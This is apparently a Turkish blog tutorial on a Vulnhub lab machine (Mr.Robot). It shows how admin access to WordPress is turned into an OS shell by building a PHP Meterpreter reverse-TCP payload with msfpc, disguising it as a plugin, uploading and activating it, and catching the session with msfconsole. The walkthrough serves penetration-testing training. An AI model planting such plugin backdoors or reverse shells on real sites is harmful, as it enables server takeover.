Erişim Sağlanan WordPress Yönetim Arayüzünde MSFVenom Payload Creator ile Oluşturulan PHP Kodunun Gömülerek İşletim Sistemine Erişim Sağlanması

Web uygulaması sızma testleri sırasında erişilen web uygulaması üzerinden işletim sisteminde kod çalıştırılabilir. Bu yazıda yönetici hakları ile erişim sağlanan WordPress yönetim arayüzü MSFVenom Payload Creator ile hazırlanan bir PHP kodunun (webshell backdoor) hedefe eklenti olarak yüklenmesi yolu ile istismar edilecek ve işletim sistemine Meterpreter ile erişim sağlanacaktır.

Not: Yazıda kullanılan Mr.Robot sanal makinesi Vulnhub sitesinden indirilebilir.

https://www.vulnhub.com/entry/mr-robot-1,151/

Mr.Robot zafiyetli sanal makineye ait WordPress yönetim arayüzünde açılan oturum aşağıdaki gibidir.

 

MSFVenom Payload Creator ile arka kapı amaçlı kullanılabilecek standalone (stageless) bir PHP kodu aşağıdaki gibi hazırlanabilir.

msfpc php 192.168.2.71 443 msf reverse stageless tcp

 

MSF handler dosyası (Resource File) otomatik olarak hazırlanmıştır.

ls
cat /root/Shell/php-meterpreter-stageless-reverse-tcp-443.rc

 

Hazırlanan bu dosya ile MSF handler modülü çalıştırılabilir ve TCP 443. porta gelen talepler yakalanabilir.

msfconsole -q -r ‘/root/php-meterpreter-stageless-reverse-tcp-443-php.rc’

 

Hedef sisteme yüklenecek olan zararlı PHP kodunun bir eklenti olarak değerlendirilmesi için yorum satırı içinde aşağıdaki gibi bir takım bilgiler girilir.

/*
Plugin Name: Yeni Eklenti
Plugin URI: Bir URI
Description: Bir Tanim
Author: Bir Yazar Adi
Version: v1.0
Author URI: Yazara Ait URI
*/

 

Sonrasında da eklenti sıkıştırılmış dosya haline getirilir.

zip ArkaKapiEklentisi.zip php-meterpreter-stageless-reverse-tcp-443.php

 

Eklentiler menüsünde “Add New > Upload Plugin” adımları izlenerek hazırlanan eklenti uygulamaya yüklenebilir.

 

Hazırlanan “ArkaKapiEklentisi.zip” dosyası seçilir ve eklenti olarak yüklenir.

 

Böylece eklenti yüklenmiştir.

 

Eklentiler menüsünden de hazırlanan bu eklenti listenebilir.

 

“Activate” bağlantısı kullanılarak bu eklenti etkinleştirildiğinde Meterpreter bağlantısının yakalandığı görülür.

sessions
sessions -i 1
getuid
getpid

 

Elde edilen erişimin (3054 ID’li proses) WordPress uygulaması üzerinden sağlandığı görülebilir.

shell
id
ps -ef | grep 3054

 

Kaynak:

https://que.com/2016/12/04/ctf-hacking-mr-robot/
http://www.r00tsec.com/2015/08/howto-create-backdoor-in-wordpress.html

 

 

 

Yazarın Bilgileri

Abdulkerim Demir
Abdulkerim Demir

Bir Cevap Yazın

E-posta hesabınız yayımlanmayacak. Gerekli alanlar * ile işaretlenmişlerdir

Kullanabileceğiniz HTLM etiketleri ve özellikleri: <a href="" title=""> <abbr title=""> <acronym title=""> <b> <blockquote cite=""> <cite> <code class="" title="" data-url=""> <del datetime=""> <em> <i> <q cite=""> <s> <strike> <strong> <pre class="" title="" data-url=""> <span class="" title="" data-url="">

Bu sayfada incelenen konulardan doğacak sorunlar kişinin kendi sorumluluğundadır.